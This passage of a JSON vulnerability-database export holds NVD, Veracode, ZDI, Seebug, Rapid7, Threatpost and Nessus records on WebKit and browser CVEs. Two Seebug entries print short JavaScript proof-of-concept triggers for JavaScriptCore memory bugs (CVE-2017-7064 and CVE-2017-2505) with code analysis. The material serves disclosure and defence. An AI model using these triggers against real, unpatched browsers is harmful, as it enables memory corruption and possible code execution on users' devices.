"description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "type": "cve", "title": "CVE-2017-7064", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2019-05-10T19:19:00", "cpe": ["cpe:/a:apple:itunes:12.6.1", "cpe:/o:apple:iphone_os:10.3.2", "cpe:/a:apple:icloud:6.2.1", "cpe:/a:apple:safari:10.1.1"], "id": "CVE-2017-7064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:icloud:6.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:itunes:12.6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:52:23", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T05:29:00", "type": "cve", "title": "CVE-2017-2505", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2019-03-21T21:46:00", "cpe": [], "id": "CVE-2017-2505", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "veracode": [{"lastseen": "2022-07-26T13:29:11", "description": "webkitgtk is vulnerable to arbitrary code execution. Multiple memory corruption issues allows for arbitrary code execution when processing malicious web content.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-03T07:38:06", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2022-04-19T18:45:51", "id": "VERACODE:29237", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29237/summary", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:53:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of JIT. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-06T00:00:00", "type": "zdi", "title": "Apple Safari Spread Operator Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-06T00:00:00", "id": "ZDI-18-271", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-271/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:56:46", "description": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of `JSArray::appendMemcpy`.\r\n```\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n```\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\n### PoC:\r\n```\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n```", "cvss3": {}, "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy(CVE-2017-7064)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96302", "id": "SSV:96302", "sourceData": "\n function optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96302", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T11:57:48", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.\r\n\r\nHere's a snippet of BindingNode::bindValue.\r\n```\r\nvoid BindingNode::bindValue(BytecodeGenerator& generator, RegisterID* value) const\r\n{\r\n ...\r\n RegisterID* scope = generator.emitResolveScope(nullptr, var);\r\n generator.emitExpressionInfo(divotEnd(), divotStart(), divotEnd());\r\n if (m_bindingContext == AssignmentContext::AssignmentExpression)\r\n generator.emitTDZCheckIfNecessary(var, nullptr, scope);\r\n if (isReadOnly) {\r\n generator.emitReadOnlyExceptionIfNeeded(var);\r\n return;\r\n }\r\n generator.emitPutToScope(scope, var, value, generator.isStrictMode() ? ThrowIfNotFound : DoNotThrowIfNotFound, initializationModeForAssignmentContext(m_bindingContext));\r\n generator.emitProfileType(value, var, divotStart(), divotEnd());\r\n if (m_bindingContext == AssignmentContext::DeclarationStatement || m_bindingContext == AssignmentContext::ConstDeclarationStatement)\r\n generator.liftTDZCheckIfPossible(var);\r\n ...\r\n}\r\n```\r\nThat method uses |scope| without increasing its reference count. Thus, in |emitTDZCheckIfNecessary|, same |RegisterID| might be used.\r\n\r\n### Generated opcode of the PoC:\r\n```\r\n[ 124] resolve_scope loc13, loc3, a(@id4), <ClosureVar>, 0, 0x62d00011f1a0\r\n[ 131] get_from_scope loc13, loc13, a(@id4), 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, 0 predicting None\r\n[ 139] op_check_tdz loc13\r\n[ 141] put_to_scope loc13, a(@id4), loc12, 1050627<DoNotThrowIfNotFound|ClosureVar|NotInitialization>, <structure>, 0\r\n```\r\nAt 131, loc13 which points the scope is overwritten with |a|.\r\nAt 141, |a| is used as a scope, and it causes OOB write.\r\n\r\n### PoC:\r\n```\r\n(function () {\r\n let a = {\r\n get val() {\r\n [...{a = 1.45}] = [];\r\n a.val.x;\r\n },\r\n };\r\n\r\n a.val;\r\n})();\r\n```", "cvss3": {}, "published": "2017-05-26T00:00:00", "type": "seebug", "title": "WebKit: JSC: BindingNode::bindValue doesn't increase the scope's reference count(CVE-2017-2505)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93145", "id": "SSV:93145", "sourceData": "\n (function () {\r\n let a = {\r\n get val() {\r\n [...{a = 1.45}] = [];\r\n a.val.x;\r\n },\r\n };\r\n\r\n a.val;\r\n})();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93145", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "rapid7blog": [{"lastseen": "2020-10-28T04:47:53", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) &amp; [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -&gt; ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-05-30T05:50:38", "description": "Google has lifted the curtain on its latest version of Chrome, which the tech giant has pledged touts more data privacy features, as well as fixes for high-priority vulnerabilities.\n\nThe release comes after Google had promised updates in Chrome 70 to \u201cbetter communicate our changes and offer more control over the experience.\u201d\n\nChrome 70 for Windows, Mac and Linux will roll out over the coming days and weeks, Google said in a Tuesday [posting](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>).\n\n## New Privacy Feature\n\nMost notably, Chrome 70 includes a panel enabling users to have more control over how the browser behaves when they log into their Google accounts.\n\nThe pressure is on Google to prioritize privacy policies after the tech giant came under fire for a change in Chrome 69, launched [earlier in September](<https://threatpost.com/google-rolls-out-40-fixes-with-chrome-69/137210/>). After that release, an update to the browser\u2019s sign-in mechanism [automatically signed users into Chrome](<https://threatpost.com/googles-forced-sign-in-to-chrome-raises-privacy-red-flags/137651/>) when they signed into any other Google service.\n\nDigs at Google increased when a separate researcher also found that when he deleted the cookies.txt files in Chrome, the browser clears all cookies \u2013 except for Google cookies.\n\nBut the new control panel means that users have the option to turn off the automatic sign-in, Zach Koch, Chrome product manager, said in a [post](<https://www.blog.google/products/chrome/product-updates-based-your-feedback/>) on the matter.\n\n\u201cWhile we think sign-in consistency will help many of our users, we\u2019re adding a control that allows users to turn off linking web-based sign-in with browser-based sign-in\u2014that way users have more control over their experience,\u201d he said. \u201cFor users that disable this feature, signing into a Google website will not sign them into Chrome.\n\n## Fixed Vulnerabilities\n\nIn addition to new privacy features, Chrome 70 also [packs](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>) 23 security fixes, including both \u201chigh\u201d and \u201cmedium\u201d priority bugs; as well as new security features.\n\nOf note are patches for a high-priority sandbox escape vulnerability (CVE-2018-17462) in AppCache; a high-priority remote code-execution flaw (CVE-2018-17463) in V8; a \u201chigh\u201d priority URL spoof bug (CVE-2018-17464) in Omnibox; and a \u201chigh\u201d memory corruption glitch (CVE-2018-17466) in Angle.\n\nOther bugs include a high-priority use-after-free flaw (CVE-2018-17465) in V8, and a high-priority heap buffer overflow vulnerability in Little CMS in PDFium (no CVE assigned yet).\n\nA full list of the security bugs and fixes are [here](<https://chromium.googlesource.com/chromium/src/+log/69.0.3497.100..70.0.3538.67?pretty=fuller&n=10000>).\n\nChrome 70 also features Web Bluetooth, which is also available in Windows 10, which allows sites to communicate with user-selected Bluetooth devices in a \u201csecure and privacy-preserving\u201d ways.\n\nAnd finally, Google released support for public key credentials in Chrome 70, which enables strong authentication to websites with public key cryptography, enabling password-less authentication and/or secure second-factor authentication without SMS texts.\n\n\u201cI\u2019m pretty excited about it because it allows sites to use my fingerprint for two-factor authentication,\u201d Pete LePage, developer advocate, said in a Tuesday [post](<https://developers.google.com/web/updates/2018/10/nic70>). \u201cBut, it also adds support for additional types of security keys and better security on the web.\u201d\n", "cvss3": {}, "published": "2018-10-17T14:04:48", "type": "threatpost", "title": "On Heels of Criticism, Newly-Released Google Chrome 70 Prioritizes Privacy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466"], "modified": "2018-10-17T14:04:48", "id": "THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "href": "https://threatpost.com/on-heels-of-criticism-newly-released-google-chrome-70-prioritizes-privacy/138368/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:01:16", "description": "Apple patched 51 vulnerabilities rated serious with its iOS (12.2) update. One of the most serious bugs could allow apps to secretly listen to end users.\n\nApple\u2019s iOS security updates, announced Monday during its March product announcement event, are for the iPhone 5s and later, iPad Air and later and iPod touch 6th generation. The phone maker also [disclosed](<https://www.us-cert.gov/ncas/current-activity/2019/03/25/Apple-Releases-Multiple-Security-Updates>) security updates across other products including iTunes, Safari, macOS, and iCloud.\n\nThe eavesdropping [iOS vulnerability](<https://support.apple.com/en-us/HT209599>) existed in ReplayKit, which allows game developers to give players the ability to easily record and share gameplay. The flaw (CVE-2019-8566) stems from an API issue existed in the handling of microphone data and could allow a malicious application to secretly access the user\u2019s microphone. \u201cAn API issue existed in the handling of microphone data,\u201d according to Apple\u2019s update. \u201cThis issue was addressed with improved validation,\u201d it stated.\n\n## Webkit\n\nMeanwhile, 19 of the phone makers\u2019 iOS vulnerabilities were discovered in the Webkit browser engine used by Safari, Mail, App Store and other apps on macOS, iOS and Linux.\n\nThese vulnerabilities included multiple memory corruption issues, which occurs when memory location contents are modified, exceeding the intention of the program constructs and potentially leading to malicious actions such as arbitrary code execution.\n\nThe iOS memory corruption issues (CVE-2019-6201, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8562, CVE-2019-8536, CVE-2019-8544, CVE-2019-8535) could allow bad actors to process maliciously crafted web content. That could lead to arbitrary code execution on vulnerable devices or allow an adversary to circumvent sandbox restrictions.\n\nAnother vulnerability (CVE-2019-6222) \u2014 stemming from a \u201cconsistency issue\u201d \u2014 could allow a website to access the microphone without the microphone use indicator being shown. This was addressed \u201cwith improved state handling,\u201d according to Apple.\n\nApple also disclosed a logic issue (CVE-2019-8551) that could lead to attackers creating maliciously crafted web content which could lead to universal cross site scripting; a cross-origin issue in the fetch API of Webkit (CVE-2019-8515) which could disclose sensitive user information; and two use after free flaws (CVE-2019-7285 and CVE-2019-8556) that could allow arbitrary code execution.\n\n## Other Bad Bugs\n\nApple also fixed an array of vulnerabilities including a bug in GeoServices, the geo-location data services feature of iOS. The flaw (CVE-2019-8553), [highlighted](<https://twitter.com/patrickwardle/status/1110283016117473281?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1110283016117473281&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) by Apple security expert Patrick Wardle, could lead to arbitrary code execution when a user clicks a malicious SMS link.\n\nhttps://twitter.com/patrickwardle/status/1110283016117473281\n\nApple also fixed two bugs (CVE-2019-8565, CVE-2019-8521) in its Feedback Assistant component (a built-in app to send feedback to Apple). The flaws could allow a malicious app to gain root privileges or overwrite arbitrary files.\n\nApple\u2019s [macOS Mojave 10.14.4](<https://support.apple.com/en-gb/HT209600>), which updates its Mac operating system, also squashes some pesky bugs. Those include a previously disclosed [Apple Keychain flaw](<https://threatpost.com/macos-zero-day-exposes-apple-keychain-passwords/141584/>) \u2013 stemming from a use after free issue. The flaw (CVE-2019-8526) impacted macOS, and could allow an attacker to extract passwords from a targeted Mac\u2019s keychain password management system. While the researcher who discovered the attack, Linus Henze, originally refused to disclose it, citing Apple\u2019s lack of macOS bug bounty program, he eventually submitted the exploit and Apple issued a fix.\n\nhttps://twitter.com/LinusHenze/status/1110316740888662016\n\nAlso patched were a macOS buffer overflow issue in the operating system\u2019s \u201cContacts\u201d feature which could allow a malicious application to elevate privileges and view users\u2019 contacts (CVE-2019-8511); as well as an access issue that could allow a bad actor to view users\u2019 locked notes (CVE-2019-8537).\n", "cvss3": {}, "published": "2019-03-26T13:54:14", "type": "threatpost", "title": "Apple iOS 12.2 Patches 51 Serious Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-6201", "CVE-2019-6222", "CVE-2019-7285", "CVE-2019-8511", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8521", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8526", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8537", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8553", "CVE-2019-8556", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8562", "CVE-2019-8563", "CVE-2019-8565", "CVE-2019-8566"], "modified": "2019-03-26T13:54:14", "id": "THREATPOST:37BD8473EEF61891FD09D32105F6C9E1", "href": "https://threatpost.com/apple-ios-12-2-patches-51-serious-flaws/143162/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:29:24", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-4438: Fixed a logic issue which lead to memory corruption (bsc#1119554)\n\nCVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464: Fixed multiple memory corruption issues with improved memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557, bsc#1119558)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-24T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", 